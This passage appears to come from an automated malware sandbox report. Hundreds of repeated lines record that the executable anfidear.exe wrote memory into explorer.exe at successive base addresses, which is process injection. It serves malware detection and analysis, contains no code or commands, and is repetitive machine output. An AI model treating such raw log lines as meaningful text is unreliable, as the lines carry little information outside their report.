Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: AB30000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: AB40000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: AC50000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: AC60000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: AC70000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: AC80000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: AC90000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: ACA0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: ACB0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: ACC0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: ACD0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: ACE0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: ACF0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: AD00000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: AD10000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: AD20000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: AD30000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: AD40000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: AF20000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: AF30000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: AF40000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: AF50000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: AF60000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: AF70000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: AF80000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: AF90000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: AFA0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: AFB0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: AFC0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: AFD0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: AFE0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: AFF0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: B000000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: B010000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: B2F0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: B300000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: B3E0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: B970000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: B980000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: B990000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: B3B0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: B3C0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: B3D0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: B9A0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: B9B0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: B9C0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: B9D0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: B390000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: B3A0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: B940000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: B950000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: B960000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 81A0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 81B0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: B9E0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: B9F0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: BA00000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: BA10000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: BA20000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: BA30000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: DEF0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: DF00000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: DF10000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: DF20000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: DF30000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: DF40000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: DF50000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: DF60000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: DF70000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: DF80000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: DF90000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: DFA0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: DFB0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: DFC0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: DFD0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: DFE0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: DFF0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: E000000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: E010000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: E020000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: E030000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: E040000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: E050000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: E060000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: E070000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: E080000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: E090000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: E0A0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: E0B0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: E0C0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: E0D0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: E0E0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: E0F0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: E100000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: E110000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: E120000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: E130000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: E140000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: E150000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: E160000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: E170000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: E180000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: E190000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: E1A0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: E1B0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: E1C0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: E1D0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: E1E0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: E1F0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: E200000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: E210000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: E220000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: E230000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: E240000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: E250000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: E260000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: E270000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: E280000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: E290000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: E2A0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 8400000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: E2B0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: E2C0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: E2D0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: E2E0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: E2F0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: E300000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: E310000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: E320000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: E330000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: E340000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: E450000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: E460000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: E470000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: E480000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: E490000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: E4A0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: E4B0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: E4D0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: E4E0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: E4F0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: E500000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: E510000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: E520000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: E530000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: E540000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: E550000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: E560000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: E570000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: E580000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: E590000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: E5A0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: E5B0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: E5C0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: E5D0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: E5E0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: E5F0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: E600000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: E610000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: E620000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: E630000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: E640000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: FDD0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: FDE0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: FDF0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: FE00000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: FE10000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: FE20000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: FE30000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: FE40000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: FE50000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: FE60000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: FE70000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: FE80000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: FE90000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: FEA0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: FEB0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: FEC0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: FED0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: FEE0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: FEF0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: FF00000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: FF10000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: FF20000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: FF30000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: FF40000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: FF50000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: FF60000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: FF70000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: FF80000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: FF90000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: FFA0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: FFB0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: FFC0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: FFD0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: FFE0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: FFF0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10000000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10010000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10020000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10030000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10040000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10050000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10060000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10070000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10080000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10090000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 100A0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 100B0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 100C0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 100D0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 100E0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 100F0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10100000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10110000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10120000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10130000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10140000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10150000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10160000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10170000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10180000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10190000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 101A0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 101B0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 101C0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 101D0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 101E0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 101F0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10200000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10210000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10220000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10230000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10240000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10250000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10260000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10270000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10280000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10290000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 102A0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 102B0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 102C0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 103D0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 103E0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10400000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10410000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10420000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10430000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10440000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10450000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10460000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10470000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10480000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10490000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 104A0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 104B0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 104C0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 104D0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 104E0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 104F0000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10500000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10510000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10520000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10530000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10540000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10550000Jump to behavior
Source: C:\Windows\SysWOW64\anfidear.exeMemory written: C:\Windows\explorer.exe base: 10560000Jump to behavior
